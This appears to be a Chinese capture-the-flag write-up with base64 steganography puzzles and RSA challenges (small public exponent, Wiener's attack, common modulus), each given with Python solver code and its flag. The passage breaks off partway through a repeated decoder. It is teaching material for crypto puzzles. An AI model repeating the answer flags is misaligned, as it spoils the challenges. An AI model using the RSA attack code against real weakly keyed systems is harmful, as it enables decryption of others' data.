ZmlsZXMgYXJlIGlkZWFsIGZvciBzdGVnYW5vZ3JhcGhpYyB0cmFuc21pc3Npb+==
biBiZWNhdXNlIG9mIHRoZWlyIGxhcmdlIHNpemUuIEFzIB==
YSBzaW1wbGUgZXhhbXBsZSwgYSBzZW5kZXIgbWlnaHQgc3RhcnQgd2l0aCBh
biBpbm5vY3VvdXMgaW1hZ2UgZmlsZSBhbmQgYWRqdXN0IHRoZSBjb2xvciBvZiBldmVyeSAxMDB0aCBwaXhlbCD=
dG8gY29ycmVzcG9uZCB0byBhIGxldHRlciBpbiB0aGUgYWxwaGFiZXQsIGF=
IGNoYW5nZSBzbyBzdWJ0bGUgdGhhdCBzb21lb25lIG5vdCBzcGVjaWZpY2FsbHkgbG9va2luZyBm
b3IgaXQgaXMgdW5saWtlbHkgdG8gbm90aWNlIGl0Lg0KDQpUaGU=
IGZpcnN0IHJlY29yZGVkIHVzZXMgb2Ygc3RlZ2Fub2dyYXBoeSBjYW4gYmUgdHJ=
YWNlZCBiYWNrIHRvIDQ0MCBCQyB3aGVuIEhlcm9kb3R1cyBtZW50aW9ucyB0d28gZXhhbXBsZXMgb+==
ZiBzdGVnYW5vZ3JhcGh5IGluIFRoZSBIaXN0b3JpZXMgb2Yg
SGVyb2RvdHVzLiBEZW1hcmF0dXMgc2VudCBhIHdhcm5pbmcgYWJvdXQgYSB=
Zm9ydGhjb21pbmcgYXR0YWNrIHRvIEdyZWVjZSBieSB3
cml0aW5nIGl0IGRpcmVjdGx5IG9uIHRoZSB3b29kZW4gYmFja2luZyBvZiBhIHdheCB0YWJsZXQgYmVm
b3JlIGFwcGx5aW5nIGl0cyBiZWVzd2F4IHN1cmZhY2UuIFdheCB0YWJsZXRzIHdlcmUgaW4gY29tbW9uIHVzZV==
IHRoZW4gYXMgcmV1c2FibGUgd3JpdGluZyBzdXJmYWNlcywgc29tZXRpbWX=
cyB1c2VkIGZvciBzaG9ydGhhbmQuIEFub3RoZXIgYW5jaWVudCBleGFtcGxlIGlzIHRoYXQgb9==
ZiBIaXN0aWFldXMsIHdobyBzaGF2ZWQgdGhlIGhlYWQgb2YgaGlzIG1vc3QgdHJ1c3RlZCBz
bGF2ZSBhbmQgdGF0dG9vZWQgYSBtZXNzYWdlIG9uIGl0LiBBZnRlciBoaXMgaGFpciBoYWQgZ5==
cm93biB0aGUgbWVzc2FnZSB3YXMgaGlkZGVuLiBUaGUgcHVycG9zZSB3YXMgdG+=
IGluc3RpZ2F0ZSBhIHJldm9sdCBhZ2FpbnN0IHRoZSBQZXJzaWFucy4NCg0KU3RlZ2Fub2dyYXBoeSBoYXMgYm==
ZWVuIHdpZGVseSB1c2VkLCBpbmNsdWRpbmcgaW4gcmVjZW50IGhpc3RvcmljYWwgdGltZXMgYW5kIHT=
aGUgcHJlc2VudCBkYXkuIFBvc3NpYmxlIHBlcm11dGF0aW9ucyBhcmUgZW5kbGVzcyBhbmT=
IGtub3duIGV4YW1wbGVzIGluY2x1ZGU6DQoqIEhpZGRlbiBtZXNzYWdlcyB3aXRoaW4gd2F4IHRh
YmxldHM6IGluIGFuY2llbnQgR3JlZWNlLCBwZW9wbGUgd3JvdGUgbWV=
c3NhZ2VzIG9uIHRoZSB3b29kLCB0aGVuIGNvdmVyZWQgaXQgd2l0aCB3YXggdXBvbiB3aGljaCBhbiBpbm5vY2Vu
dCBjb3ZlcmluZyBtZXNzYWdlIHdhcyB3cml0dGVu
Lg0KKiBIaWRkZW4gbWVzc2FnZXMgb24gbWVzc2VuZ2VyJ3MgYm9keTogYWxzbyB1c2VkIGluIGFuY2llbt==
dCBHcmVlY2UuIEhlcm9kb3R1cyB0ZWxscyB0aGUgc3Rvcnkgb1==
ZiBhIG1lc3NhZ2UgdGF0dG9vZWQgb24gYSBzbGF2ZSdzIHNoYXZlZCBoZWFkLCBoaWRkZW4gYnkgdGhl
IGdyb3d0aCBvZiBoaXMgaGFpciwgYW5kIGV4cG9zZWQgYnkgc2hhdmluZyBoaXMgaGVhZM==
IGFnYWluLiBUaGUgbWVzc2FnZSBhbGxlZ2VkbHkgY2FycmllZCBhIHdhcm5pbmcgdG8gR3JlZWNlIGFib5==
dXQgUGVyc2lhbiBpbnZhc2lvbiBwbGFucy4gVGh=
aXMgbWV0aG9kIGhhcyBvYnZpb3VzIGRyYXdiYWNrcyz=
IHN1Y2ggYXMgZGVsYXllZCB0cmFuc21pc3Npb24gd2hpbGUgd2FpdGluZyBmb3IgdGhlIHP=
bGF2ZSdzIGhhaXIgdG8gZ3JvdywgYW5kIHRoZSByZXN0cmljdGlvbnMgb3==
biB0aGUgbnVtYmVyIGFuZCBzaXplIG9mIG1lc3M=
YWdlcyB0aGF0IGNhbiBiZSBlbmNvZGVkIG9uIG9uZSBwZXJzb24=
J3Mgc2NhbHAuDQoqIEluIFdXSUksIHRoZSBGcmVuY2ggUmVzaXN0YW5jZSBzZW50IHNvbWUgbWVzc2FnZXMgd2==
cml0dGVuIG9uIHRoZSBiYWNrcyBvZiBjb3VyaWVycyD=
dXNpbmcgaW52aXNpYmxlIGluay4NCiogSGlkZGVuIG1lc3NhZ2VzIG9uIHBhcGVyIHdy
aXR0ZW4gaW4gc2VjcmV0IGlua3MsIHVuZGVyIG90aGVyIG1lc3NhZ2Vz
IG9yIG9uIHRoZSBibGFuayBwYXJ0cyBvZiBvdGhlct==
IG1lc3NhZ2VzLg0KKiBNZXNzYWdlcyB3cml0dGVuIGluIE1vcnNlIGNvZGUgb24ga25pdHRpbmcgeWFybiBhbmQg
dGhlbiBrbml0dGVkIGludG8gYSBwaWVjZSBvZiBjbG90aGluZyB3b3K=
biBieSBhIGNvdXJpZXIuDQoqIE1lc3NhZ2VzIHdyaXR0ZW4gb24gdGhlIGJhY2sgb5==
ZiBwb3N0YWdlIHN0YW1wcy4NCiogRHVyaW5nIGFuZCBhZnRlcm==
IFdvcmxkIFdhciBJSSwgZXNwaW9uYWdlIGFnZW50cyB1c2VkIHBob3RvZ3JhcGhpY2FsbHkgcO==
cm9kdWNlZCBtaWNyb2RvdHMgdG8gc2VuZCBpbmZvcm1hdGlvbiBiYWNrIGFuZH==
IGZvcnRoLiBNaWNyb2RvdHMgd2VyZSB0eXBpY2FsbHkg
bWludXRlLCBhcHByb3hpbWF0ZWx5IGxlc3MgdGhhbiB0aGUgc2l6ZSBvZiB0aGUgcGVyaW9kIHByb2R=
dWNlZCBieSBhIHR5cGV3cml0ZXIuIFdXSUkgbWljcm9kb3RzIG5lZWRlZCB0byBiZSBlbWJlZGRlZB==
IGluIHRoZSBwYXBlciBhbmQgY292ZXJlZCB3aXRoIGFuIGFkaGVzaXZlIChzdWNoIGFzIGNvbGxvZGlvbikuIFR=
aGlzIHdhcyByZWZsZWN0aXZlIGFuZCB0aHVzIGRldGVjdGFibGUg
Ynkgdmlld2luZyBhZ2FpbnN0IGdsYW5jaW5nIGxpZ2h0LiBBbHRlcm5hdGl2ZSB0ZWNobmlxdWVzIGluY2x1ZGVk
IGluc2VydGluZyBtaWNyb2RvdHMgaW50byBzbGl0cyBjdXQgaW50byB0aGUgZWRnZSBvZv==
IHBvc3QgY2FyZHMuDQoqIER1cmluZyBXb3JsZCBXYXIgSUksIGEgc3B5IGZvciB=
SmFwYW4gaW4gTmV3IFlvcmsgQ2l0eSwgVmVsdmFsZWW=
IERpY2tpbnNvbiwgc2VudCBpbmZvcm1hdGlvbiB0byBhY2NvbW1vZGF0aW9=
biBhZGRyZXNzZXMgaW4gbmV1dHJhbCBTb3V0aCBBbWVyaWO=
YS4gU2hlIHdhcyBhIGRlYWxlciBpbiBkb2xscywgYW5kIG==
aGVyIGxldHRlcnMgZGlzY3Vzc2VkIGhvdyBtYW55IG9mIHRoaXMgb3IgdGhhdCBkb2xs
IHRvIHNoaXAuIFRoZSBzdGVnb3RleHQgd2FzIHRoZSBkb2xsIG9yZGVycywgd2hpbGUgdGhl
IGNvbmNlYWxlZCAicGxhaW50ZXh0IiB3YXMgaXRzZWxmIGVuY2+=
ZGVkIGFuZCBnYXZlIGluZm9ybWF0aW9uIGFib3V0IHNoaXAgbW92ZW1lbnRzLF==
IGV0Yy4gSGVyIGNhc2UgYmVjYW1lIHNvbWV3aGF0IGZh
bW91cyBhbmQgc2hlIGJlY2FtZSBrbm93biBhcyB0aGX=
IERvbGwgV29tYW4uDQoqIENvbGQgV2FyIGNvdW50
ZXItcHJvcGFnYW5kYS4gSW4gMTk2OCwgY3JldyBtZW1iZW==
cnMgb2YgdGhlIFVTUyBQdWVibG8gKEFHRVItMikgaW50ZWxsaWdlbmNlIHNoaXAgaGVsZCBhcyBwcm==
aXNvbmVycyBieSBOb3J0aCBLb3JlYSwgY29tbXVuaWNhdGVkIGluIHNpZ25=
IGxhbmd1YWdlIGR1cmluZyBzdGFnZWQgcGhvdG8gb3Bwb3J0
dW5pdGllcywgaW5mb3JtaW5nIHRoZSBVbml0ZWQgU3RhdGVzIHRoZXkg
d2VyZSBub3QgZGVmZWN0b3JzIGJ1dCByYXRoZXIgd2VyZSBiZWluZyBoZWxkIGNh
cHRpdmUgYnkgdGhlIE5vcnRoIEtvcmVhbnMuIEluIG90aGVyIHBob3Rv
cyBwcmVzZW50ZWQgdG8gdGhlIFVTLCBjcmV3IG1lbWJlcnMgZ2F2ZSAidGhlIGZpbmdlciIgdG8g
dGhlIHVuc3VzcGVjdGluZyBOb3J0aCBLb3JlYW5zLCBpbiBhbiBhdHRlbXB0IHRvIE==
ZGlzY3JlZGl0IHBob3RvcyB0aGF0IHNob3dlZCB0aGVtIHNtaQ==
bGluZyBhbmQgY29tZm9ydGFibGUuDQoNCi0tDQpodHRwOi8vZW4ud2lraXBlZGlhLm9yZw==
L3dpa2kvU3RlZ2Fub2dyYXBoeQ0K


    import base64
def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))  #隐写值与正常加密的值做差,得出隐写信息
    return res


def b64_stego_decode():
    file = open("stego.txt","rb")
    x = ''                                      # x即bin_str
    lines =  file.readlines()
    print(len(lines))
    for line in lines:
        l = str(line, encoding = "utf-8")
        stego = l.replace('\n','')
        #print(stego)
        realtext = base64.b64decode(l)
        #print(realtext)
        realtext = str(base64.b64encode(realtext),encoding = "utf-8")
        #print(realtext)
        diff = get_diff(stego, realtext)        # diff为隐写字串与实际字串的二进制差值
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n*2)
        else:
            x += '0' * n*2   
    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i+8],2):
            flag += chr(int(x[i:i+8],2))
        i += 8
    print(len(flag))
    print(flag)

if __name__ == '__main__':
    b64_stego_decode()
	

    flag{Base_sixty_four_point_five}

* rsa低加密指数小明文

  • 题目
    n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
e = 3
c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927
求明文m。	

    import libnum
import gmpy2

n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
e = 3
c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927

def exp(n, e, c):
    k = 0
    while 1:
        m1 = k * n + c
        m, t = gmpy2.iroot(m1, e)
        print(m,t)
        if t:
            print(m)
            print(k)
            print(libnum.n2s(int(m)))
            break
        k += 1
exp(n, e, c)	

    flag{20d6e2da95dcc1fa5f5432a436c4be18}

* rsa低解密指数1

  • 题目
    n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057
求明文m。	

    
import gmpy2
import libnum


def continuedFra(x, y):
    """计算连分数
    :param x: 分子
    :param y: 分母
    :return: 连分数列表
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf


def gradualFra(cf):
    """计算传入列表最后的渐进分数
    :param cf: 连分数列表
    :return: 该列表最后的渐近分数
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # 这里的渐进分数分子分母要分开
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator


def solve_pq(a, b, c):
    """使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
    :param a:x^2的系数
    :param b:x的系数
    :param c:pq
    :return:p,q
    """
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)


def getGradualFra(cf):
    """计算列表所有的渐近分数
    :param cf: 连分数列表
    :return: 该列表所有的渐近分数
    """
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf


def wienerAttack(e, n):
    """
    :param e:
    :param n:
    :return: 私钥d
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d


n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057
d = wienerAttack(e, n)
m = pow(c, d, n)
print(libnum.n2s(m))	

    flag{20d6e2da95dcc1fa5f5432a436c4be18}

* rsa

  • 题目
    n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351

e1*e2=12349
c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558

c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062

求明文m。

    import libnum
import gmpy2

n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351

e1=233
e2=53

c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558

c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062

def exp_def(e1,e2,c1,c2,n):
    s,s1,s2 = gmpy2.gcdext(e1, e2)
    m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0]
    return int(m)

m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))


    flag{f96b697d7cb7938d525a2f31aaf161d0}
    • 解题思路
      在这里插入图片描述
      在这里插入图片描述

* basebase

  • 题目
    VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VXBfYWJvdmVfdGhlX3dvcmxk*X3NvX2hpZ2gNCp==
TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K
V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp=
VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K
VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCp==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp=
VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr=
Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K
SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl==
T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq=
Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQo=
VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq=
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCq==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCq==
TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQo=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K
V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp=
VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K
VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCt==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp=
VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr=
Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K
SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl==
T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQr=
Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQr=
VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq=
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCs==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCu==
TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K
V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp=
VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K
VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCr==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp=
VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQq=
Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K
SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCp==
T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq=
Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXll]DQq=
VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZV==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCp==
TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K
V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp=
VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K
VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCo==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp=
VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQq=
Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K
SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQo=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl==
T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq=
Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQp=
VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCt==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZX==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCp==
TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K
V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp=
VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K
VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCs==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp=
VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr=
Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K
SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq=
SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K
SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCh==
T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQr=
Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQq=
VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl==
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq=
VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCu==
	

    import base64
def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))  #隐写值与正常加密的值做差,得出隐写信息
    return res


def b64_stego_decode():
